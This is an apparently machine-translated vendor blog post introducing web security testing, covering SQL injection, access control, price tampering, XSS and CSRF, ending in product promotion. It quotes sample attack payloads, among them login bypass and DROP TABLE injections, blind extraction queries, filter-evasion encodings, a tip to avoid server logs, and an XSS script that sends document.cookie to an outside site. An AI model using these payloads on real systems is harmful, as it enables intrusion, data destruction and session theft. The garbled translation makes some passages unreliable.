Safety Test Sailing Trip

Cloud Wisdom Wang Xiaoyu

Security testing is the process of testing a product to verify that the product complies with the security requirements definition and product quality standards during the life cycle of the IT software product, especially when the product development is basically completed to the release stage. In a nutshell, safety testing is the process of checking whether a product meets security requirements.

It is well known that software testing is divided into four main types: Functional testing, automated testing, safety testing and performance testing, and security testing is performed prior to performance testing in functional and automated tests, so that some of the problems that may be modified after a security test will affect performance.

The content of a security test usually includes skipping permission validation, modifying submitted request information, and so on, and more complex products for SQL injection, cross-site scripting and other tests, let's look at security issues for Internet products threats.

SQL injection

Due to the uneven level of programmers and work experience, quite a lot of programmers in the writing process of the user input data legitimacy is not judged, to the application to bring a certain security risks, users can submit a database query code, in the resulting results to analyze the data he wants, This is called SQL injection, which is SQL injection.

For a product or Web site, if a security test is missing, an attacker could either directly Bauku (get all the databases) or get the database name used by the current project, the account used by the Web app, the table, the table structure, the field name, or even the data stored in the database, and so on, by means of the SQL blinds. That's why our underlying connection database code uses some anti-SQL injection technology.

SQL injection is from the normal WWW port access, and the surface looks like normal web page access is no different, so the current market firewall will not alert the SQL injection, if the administrator does not check the server log habits, may be invaded for a long time will not be detected.

Demonstrate one of the most basic vulnerabilities:

650) this.width=650; "height=" 462 "src=" https://static.oschina.net/uploads/space/2016/1109/142048_Axph_1792703. PNG "width=" 1188 "style=" Border:none;margin:auto;height:auto; "/>

A System login page, follow the way to enter the user face password click Log in, the results of the successful login, why?

The classic SQL for the login module is:

Select ID from user where uname= ' + username + ' and pwd= ' + password+ '

If the user name is admin and the password is 123456 for the system, then the SQL statements generated when logging in are as follows:

Select ID from user where uname= ' admin ' and pwd= ' 123456 '

If the malicious input is shown in the image, the SQL becomes as follows:

Select ID from user where uname= ' admin ' and pwd= ' or ' 1=1 '

Or a simpler one to directly input the user name into: admin '-

This is logged in as an administrator or successfully logged in as a uname user, which is an SQL statement that can be parsed and executed for the SQL parser.

We know that the MySQL code notation is represented by--if we change the SQL statement above:

Select ID from user where uname= 'or ' 1=1 ';d ROP table user;--' and pwd= '

The red part is our input, so that our SQL can still be parsed correctly, causing the user table to be deleted (if you have permission to delete the table), or if you do not have permission to delete the table, we can use delete from user to delete the entire table of the data to replace the effect of deleting the entire table.

Of course, depending on the type of parameters required by SQL, the type of injection parameters required is different, it is common to determine if there is SQL injection for a parameter point in the following two ways:

1. After the parameters directly add ' to see whether the error, if the database reported internal errors, you can determine the problem of SQL injection.

2. If the parameter type is int, you can use and 1=1;and 1=2 to judge, if and 1=1 can search out, and and 1=2 search out the result is null or error, then we recognize the existence of SQL injection vulnerability, because if and 1=1 and and 1 = 2 If the system is not scored, the two return values should be the same as the original value, if two are completely as characters into the system two return values should be empty, such as 1; for the string type, we can use ' and ' 1 ' = ' 1 and ' and ' 1 ' = ' second judgment, such as 2, The same reason as the int type. If it is a search-type parameter, it can be injected with ' and '%, such as 3. Depending on the actual situation, it is necessary to consciously analyze the parameters that need to be injected to get the injected statement.

650) this.width=650, "height=", "src=" https://static.oschina.net/uploads/space/2016/1109/142108_LwgJ_1792703. PNG "width=" "style=" Border:none;margin:auto;height:auto; "/>

The existence of a SQL injection vulnerability has been identified as a tester who can report the vulnerability to developers for remediation, but as a security enthusiast we can do more. The most basic way is to use a simple SQL statement to guess the table name and the field name, the method of confirming the table name can be judged by and true, and false, such as: and (select COUNT (*) from user) >0 returned as a null proof that the user table exists, return The same as the original page, the proof does not exist, and the method of confirming the field, such as: and (select COUNT (username) from user) >0; let us focus on the method of confirming the value of the field, this piece is quite fun.

Let's take an example of character type, if there is a username field, first you need to know the length of the field value, with the following statement:

and (select Length (username) from users where id=1) =1~10

Second, you need to find each of the above letters (A-Z-A-0-9)

and substr ((select Usernname from users where id=1) = ' A '--' z '

Of course, you can also use the ASCII method:

and (Select ASCII (substr (username,1,1)) from users where id=1) =0~128

Consider an example:

1. Get the length first, intercept the request with SQL injection through the Burpsuite tool, parameterize the highlight in the graph, and get the Name field value length of 4;

650) this.width=650; "height=" 435 "src=" https://static.oschina.net/uploads/space/2016/1109/142136_bqxq_1792703. PNG "width=" 795 "style=" Border:none;margin:auto;height:auto; "/>

2. Then corresponding to get the Name field value of each bit, and then each to obtain each bit corresponding to the value of the ASCLL code (parameterization is 0~128) to find out.

650) this.width=650; "height=" src= "http://static.oschina.net/uploads/space/2016/1109/142154_5T8r_1792703.png "Width=" style= "Border:none;margin:auto;height:auto";/>

The way the characters are parameterized when A~z a~z 0~9, set these on.

650) this.width=650; "height=" 1096 "src=" http://static.oschina.net/uploads/space/2016/1109/142219_ySRb_1792703. PNG "width=" "style=" Border:none;margin:auto;height:auto; "/>

Sometimes the developer will consciously perform some kind of input filtering to prevent the attacker from entering characters such as '. Selecet ', and see below how to avoid the characters:

3. Using ASCII code to dynamically build an alternative, such as single quotes in the input is masked, we can try to use the ASCII code of the characters instead of: CHAR (39).

4. If the Select keyword is blocked, try using the URL hex code:

%00select

%53%45%4c%45%43%54

Some developers may filter select, Update, delete these keywords, but forget the case-sensitive, you can use Select to try it. When you can't guess the name of a field, you might want to look at the form on the site, generally to make it easier for the field names to take the same name as the form's input box.

Special note: The Address bar of the + number is interpreted as a space after the program,%2B interpreted as the + number,%25 is interpreted as the% number, and when injected with the Get method, IIS, Apache and other Web servers will record all the strings you commit, and the Post method is not recorded, so you can use Post URLs try not to get them.

650) this.width=650; "height=" 428 "src=" http://static.oschina.net/uploads/space/2016/1109/142243_e4Pi_1792703.png "Width=" 565 "style=" Border:none;margin:auto;height:auto;/>

But the use of perspective Bao products students do not have this concern, because the bottom of the perspective Treasure Database Connection code has been used some anti-SQL injection technology, can rest assured use!

Harm of permission control

Next talk about permissions control, permissions as if the company's access to the door, only with the access card students can casually in and out, and no access to the person although can go out, but the security of the company can only let the students inside the door or someone else's card is allowed to come in, this is the most simple permission. If there is less security, then some people will skip the privilege to do something they shouldn't.

To give a simple example, a login module only enter the registered user name password to log in successfully, then we will honestly enter our own registered user name password (such as [email protected]/123), and then you can log on successfully. But what if we enter a username that doesn't exist?

First look at the SQL, login module to the database comparison with the following SQL:

Select COUNT (*) from user where uname= "[email protected]" and pwd= "123"

Of course, the actual application of SQL will be more complex than this, if the SQL behind the addition of some special string ' or ' 1=1 the results will be what?

Select COUNT (*) from user where uname= "[email protected]" and pwd= "or" 1=1 "

We successfully bypass login rights certification ... Well, only registered users can log in?! ...... I feel like I don't believe in love anymore.

Access control can be broadly categorized into three broad categories: vertical access control, horizontal access control, and context-sensitive access control. If you want to prove that an e-commerce system does not have permission problems, you need to verify the following points:

First, whether the login can not be authorized , that is, some requests are required to log in to access the request, the result of the direct access to the request without logging in the case can also access success;

Second, there is no ultra vires problem , such as whether the ordinary user can access only the administrator user to access the request, if it can be explained that there is an ultra vires security vulnerability;

Third, if User A and User B belong to ordinary users, everyone's access request is similar, but the content will be different, then you can see if B can see only a permission to see the content;

Finally, some functions need to be segmented operation to succeed, such as retrieving the password function, to first enter the user account, and then by answering a variety of secret protection problems, the last to obtain the password, if a step does not do the right control, it may lead to the application ignore the previous verification results and directly perform the current phase of the problem;

Five, based on the access control of the Referer message header, attempts to perform some authorized privileged operations and submits a missing Referer message header or its modified request, and if the change causes the application to block the request, the application is likely to use the Referer message header in an unsafe manner. This continues with an attempt to perform the same operation with a user account that is not authenticated, but submits the original Referer message header to confirm that the system is able to perform the operation successfully and possibly gain administrator privileges.

Next talk about modifying the submission data content, such as we on a treasure to buy a kidney 8, need to pay the amount 10000 RMB, pay the time through the tool to intercept the payment request, the revised amount of 1 RMB, submitted after the discovery unexpectedly paid success. Omg! Children who like apples no longer have to worry about their kidneys, haha. These are because the code only in the front-end to do the verification, the back end did not do two verification caused by the vulnerability, the perspective of the product almost all of the verification is on the back end of the verification, so there is no need to worry about the client bypass the vulnerability.

Security implications of cross-site scripting

Finally, a brief talk about the security implications of cross-site scripting, cross-site scripting (Scripting, or XSS) is a computer security vulnerability that often appears in web applications, allowing malicious Web users to embed code into pages that are available to other users. A malicious script executes when the user is viewing a webpage. This type of attack by injecting HTML or JS and other scripts to launch, after the successful attack can be access to private web content and cookies, etc., in recent years, XSS attacks have become the most popular web attack mode.

XSS is divided into three major categories:

1. Reflective XSS: Not stored in the database, directly through page 302 jump to the page, only in a timely manner to display malicious script on the page, the test method is <script>alert (' XSS ');</script>, <script >alert (Doucument.cookie);</script>;

2. Stored XSS: stored in the database, and then read from the database to display on the page;

3. Dom-based XSS: Do not save to the database and do not have a request relationship with the background, only on the DOM or JS.

The harm of XSS includes stealing all kinds of user accounts (machine login account, user Net bank account number, all kinds of Administrator account), control data (including read, tamper, add, delete enterprise sensitive data ability), stealing enterprise important business value of information, illegal transfer, forced to send website hanging horse, Control the victim's machine to launch attacks on other websites ...

As an example of a stored XSS vulnerability, someone in a dating site wrote a script in their personal information, such as:

<script>window.open (Http://www.mysite.com?yourcookie =document.cookie) </script>

The site does not correctly encode the content, then other users of the site will see the User Information page, the current cookie will be submitted to the user's Web site.

Information about XSS vulnerabilities you can search on the Internet, I do not describe it carefully ~

CSRF Cross-site request forgery

Speaking of XSS, then by the way CSRF also briefly said, CSRF (Cross-site request forgery) is a cross-site requests forgery meaning, also known as "one click Attack" or session riding, usually abbreviated to CSRF Or XSRF, is a malicious use of the site. Although it sounds like a cross-site script (XSS), it is very different from XSS and is almost at odds with the way it is attacked.

XSS Exploits trusted users (victims) within the site, and CSRF uses trusted sites by disguising requests from trusted users, using social engineering methods (such as sending a link via email) to confuse victims with sensitive actions such as changing passwords, changing e-mails, transferring money, etc. And the victim was unaware that he had been recruited.

CSRF's destructive power relies on the victim's authority, and if the victim is an ordinary user, a successful CSRF attack can compromise the user's personal data and functionality, and if the victim has administrator rights, a successful CSRF attack can even threaten the security of the entire site. Compared to XSS attacks, CSRF attacks are often less prevalent (and therefore very scarce) and difficult to guard against, so it is considered more dangerous than XSS, so CSRF has a big name in the industry-the sleeping giant.

Give a typical example of CSRF:

650) this.width=650; "height=" "src=" http://static.oschina.net/uploads/space/2016/1109/142307_tkGQ_1792703.png "Width=" 548 "style=" Border:none;margin:auto;height:auto;/>

Alice logged on to a financial website mybank.com ready to pay online, Bob knew about the financial website and realized that there was a CSRF loophole in the transfer function of the site, so Bob posted a log on myblog.com that supported the IMG customization feature, BOB Insert this line of HTML code:

Alice opened another tab on her browser and just read this page, so Alice's account unknowingly transferred $3000 to Bob's account without her knowledge.

This share first come here, just under the Enlightenment, the detailed process will have the opportunity to give you a brief introduction, thank you ~

650) this.width=650; "height=" 430 "src=" https://static.oschina.net/uploads/space/2016/1109/142426_6BID_1792703. PNG "width=" 430 "style=" Border:none;margin:auto;height:auto; "/>

Cloud Intelligence is the business operation and maintenance solution service provider, its product monitoring Bao (www.jiankongbao.com), Perspective Bao (www.toushibao.com), Pressure measurement bao (www.yacebao.com), has been accumulated for e-commerce, mobile internet, advertising media, Online games, education, medical, financial securities, enterprises and other industries hundreds of thousands of users to provide a one-stop application performance monitoring, management and testing services.

Safety Test Sailing Trip